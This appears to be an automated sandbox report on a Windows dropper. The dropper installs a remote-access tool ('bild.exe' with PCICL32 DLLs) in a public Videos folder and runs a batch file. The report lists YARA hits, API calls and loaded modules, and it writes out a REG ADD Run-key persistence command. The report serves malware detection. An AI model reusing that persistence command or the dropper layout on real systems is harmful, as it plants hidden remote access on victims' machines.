Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101F6B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101F6B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,5_2_11032EE0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,4_2_110321E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110076F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11113880
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,5_2_11113880
                                Source: Yara matchFile source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.3754800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7444, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7892, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 8168, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00415984
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408409
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040E045
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042E8D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004130E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041E94A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040D1D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041F25E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00403203
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040BA1A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041FAC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042A35E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00422B78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00412B3A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DBE2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004163F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EC97
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040D5E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00412DB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00415DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041EE46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041F693
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00405E96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00429EB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040276C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00403FC5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414FB5
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110733B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11029590
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11061C90
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11033010
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11163220
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11167485
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110454F0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101B760
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111258B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101BBA0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11087C60
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11070090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11080480
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1115E980
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101C9C0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110088AB
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11061C90
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11033010
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110733B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11163220
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11029590
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11167485
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110454F0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101B760
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111258B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101BBA0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11087C60
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11070090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11080480
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115E980
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101C9C0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110088AB
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Process token adjusted: Security
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 110B7A20 appears 40 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11146450 appears 1092 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11146EC0 appears 39 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1116F010 appears 70 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11029450 appears 1827 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 111603E3 appears 76 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11173663 appears 37 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1105DD10 appears 548 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11081BB0 appears 77 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1105DE40 appears 52 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11164010 appears 64 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0041CDF0 appears 37 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0041D870 appears 31 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0041CEC0 appears 53 times
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs file.exe
Source: file.exe, 00000000.00000003.1727368341.00000000038BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: classification engine | Classification label: mal88.rans.evad.winEXE@11/13@1/2
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11059C50 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Users\user\Desktop\file.exe | Command line argument: *xE | 0_2_0041C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: *aD | 0_2_0041C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: 8yE | 0_2_0041C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxname | 0_2_0041C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxstime | 0_2_0041C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: STARTDLG | 0_2_0041C131
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 50%
Source: file.exe | Virustotal: Detection: 51%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
Source: unknown | Process created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: unknown | Process created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcicl32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: shfolder.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcichek.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcicapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: mpr.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: version.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wininet.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: dbghelp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: dbgcore.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wtsapi32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: nsmtrace.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: nslsp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcihooks.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: winsta.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wbemcomn.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: riched32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: riched20.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: usp10.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msls31.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: amsi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: userenv.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pciinv.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: iertutil.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: firewallapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: dnsapi.dll
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
